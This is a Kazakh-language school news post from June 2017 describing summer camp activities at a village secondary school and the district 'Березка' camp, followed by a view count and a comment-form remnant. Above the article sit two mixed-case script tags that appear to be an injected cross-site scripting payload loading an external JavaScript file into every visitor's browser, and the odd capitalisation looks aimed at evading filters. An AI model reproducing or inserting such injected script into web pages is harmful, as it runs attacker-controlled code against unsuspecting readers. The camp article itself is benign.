<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

06.06.2017

Жаз мезгілі, балалардың асыға күтетін мерейлі маусымы. Күнделікті сабақтар артта қалып, осы уақытты балғындар барынша қызықты әрі көңілді өткізуді армандайды. Жаз маусымы басталысымен оқушы қауымның арманына арқау болатын демалыс орындары да есіктерін айқара ашты. Осындай жазғы демалыс алаңдарының бірі 1 маусымнан басталады. Осындай демалыс біздің Ғ. Әбдірахманұлы атындағы Қима орта мектебінде де басталып кетті.  Мектепішілік жазғы демалыс алаңы жыл сайын жұмыс істеп келеді. Ойын-сауық алаңы оқушылардың бос уақытын тиімді әрі пайдалы ұйымдастыруға және денсаулықтарын нығайтуға бағытталған. Жазғы демалысты, балалар тиімді әрі көңілді өткізеді. Біз балғындармен бірге сурет саламыз, ән айтамыз, саяхатқа шығамыз. балалар кітапханасына, мұражайға барамыз.  Лагерьде топ болып ойын ойнаймыз, қызықты есептер шығарамыз. Жаз бойы ауылымыздың мектеп жанындағы интернатта аудандық «Березка» лагері балалармен жұмыс жасайды. Осы лагерьге жиналған балалармен жас мамандар, мектеп тәлімгерлер, алдын-ала құрастырылып бекітілген жоспар арқылы жұмыс жасайды. Аудандық лагердің айырмашылығы, жан-жақтан келген балалардың арасында достық, адамгершілік қасиет қалыптасады. Осылай жазғы демалыс мезгілі қызықты басталып кетті.

Просмотров: 618


Пікір қосу



Деректерді қолтаңбаға қосу